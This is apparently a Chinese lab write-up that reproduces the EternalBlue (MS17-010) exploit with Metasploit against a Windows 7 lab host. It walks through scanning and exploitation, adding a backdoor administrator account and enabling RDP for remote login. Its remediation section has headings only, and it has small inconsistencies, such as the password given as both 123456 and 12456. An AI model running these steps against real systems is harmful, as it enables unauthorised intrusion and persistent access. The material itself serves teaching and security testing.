目录
一、漏洞简介
漏洞原理
影响版本
二、漏洞复现
三、复现过程
1、扫描局域网内的C段主机(主机发现)
扫描结果:
2.使用MSF的永恒之蓝漏洞模块
3.对主机进行扫描,查看其是否有永恒之蓝漏洞
4.准备攻击
四、漏洞利用
五、提升权限
1.创建新用户
2.将用户添加至管理员群组
3.查看端口的开启情况
六、远程登录
七、漏洞修复
一、漏洞简介
永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的漏洞利用工具,最初在2017年由“影子经纪人”(Shadow Brokers)组织泄露。这个漏洞利用工具利用了Windows操作系统中的一个安全漏洞(CVE-2017-0144),允许攻击者远程执行代码,无需用户交互即可远程控制受感染的计算机。具体来说,它利用了Windows Server Message Block (SMB) v1协议中的漏洞,使得攻击者可以在目标系统上执行恶意代码,甚至可以在未经授权的情况下传播自身。
永恒之蓝漏洞的爆发引发了全球范围内的关注,尤其是在2017年的“惊叹号勒索软件”(WannaCry ransomware)攻击中,该漏洞被大规模利用,造成了数十万台计算机的感染和停机事件。这次攻击揭示了许多组织和公司在保护其网络安全方面的薄弱之处,也促使了更广泛的安全漏洞修复和网络防护措施的加强。
漏洞原理
永恒之蓝漏洞的利用基于Windows操作系统中的一个漏洞(CVE-2017-0144),主要涉及以下几个方面的技术细节:
-
Windows SMB服务漏洞:漏洞利用了Windows操作系统中的Server Message Block (SMB) v1协议的一个安全漏洞。SMB协议是Windows系统用于文件和打印机共享的网络协议。 -
远程执行代码(RCE):漏洞允许攻击者通过发送特制的网络数据包,无需用户交互即可远程执行恶意代码。这使得攻击者可以获取目标系统的控制权。 -
无需身份验证:攻击者可以在不需要凭据或者认证的情况下利用漏洞,这使得漏洞的利用更为危险和普遍。
影响版本
永恒之蓝漏洞主要影响以下版本的Windows操作系统:
-
Windows Vista -
Windows Server 2008 -
Windows 7 -
Windows Server 2008 R2
二、漏洞复现
环境
-
攻击机:Linux kali (IP:192.168.220.128) -
靶机:Windows 7 旗舰版(IP;192.168.220.133)
环境说明:Windows 7 防火墙关闭,445端口打开,两台主机之间可以ping通
三、复现过程
1、扫描局域网内的C段主机(主机发现)
扫描结果:
-
192.168.220.2
-
192.168.220.128
-
192.168.220.133
2.使用MSF的永恒之蓝漏洞模块
打开MSF
msfconsole
这个界面每次都不相同。
搜索漏洞代码:ms17_010
search ms17_010
这里可以看到26个可以利用的模块及其描述:
-
exploit/windows/smb/ms17_010_eternalblue
目标包括:
这个模块利用了SMB服务上的漏洞,通常使用的是TCP端口445。 -
exploit/windows/smb/ms17_010_psexec
目标包括:
-
自动目标 -
PowerShell -
本地上传(Native upload) -
MOF上传(MOF upload)
这个模块利用了SMB服务上的漏洞,同样使用的是TCP端口445。 -
auxiliary/admin/smb/ms17_010_command
这个模块用于执行远程命令,同样是基于SMB服务上的漏洞,端口也是TCP端口445。 -
auxiliary/scanner/smb/smb_ms17_010
这个模块用于检测目标系统是否受到MS17-010漏洞的影响,同样基于SMB服务,端口是TCP端口445。
3.对主机进行扫描,查看其是否有永恒之蓝漏洞
使用模块24开始攻击:use 24,也可以用use scanner/smb/smb_ms17_010
用options查看需要设置的参数
设置目标主机set rhost 192.168.220.133,设置成功会返回rhost的值,用run开始
4.准备攻击
使用模块0开始攻击:use 0,也可以用use windows/smb/ms17_010_eternalblue
查看需要设置的参数:options
设置目标ip地址
set rhost 192.168.220.133
run
看到win说明成功
四、漏洞利用
获取靶机shell
shell
乱码是因为linux和windows的编码方式不同导致
使用代码:chcp 65001
查看IP:ipconfig
五、提升权限
1.创建新用户
net user bai 123456 /add
bai是用户名,12456是密码
2.将用户添加至管理员群组
net localgroup administrators bai /add
3.查看端口的开启情况
netstat -ano
4.开启3389端口
输入exit退出命令行,在meterpreter中输入run post/windows/manage/enable_rdp
查看端口
成功开启3389端口
六、远程登录
打开一个新终端,输入rdesktop 192.168.220.133
中途会让确认,输入yes确认
选择其他用户
输入我们刚才新加的用户名和密码
登录成功!
七、漏洞修复
永恒之蓝漏洞(EternalBlue)是一个影响Windows操作系统的严重安全漏洞,可被用于远程执行代码攻击。微软已经发布了修复补丁来解决这个漏洞,以及其他相关的安全更新。以下是修复永恒之蓝漏洞的主要方法:
-
安装官方补丁:
-
更新操作系统:
-
禁用不必要的服务:
-
配置防火墙:
-
网络隔离:
-
使用安全软件:
|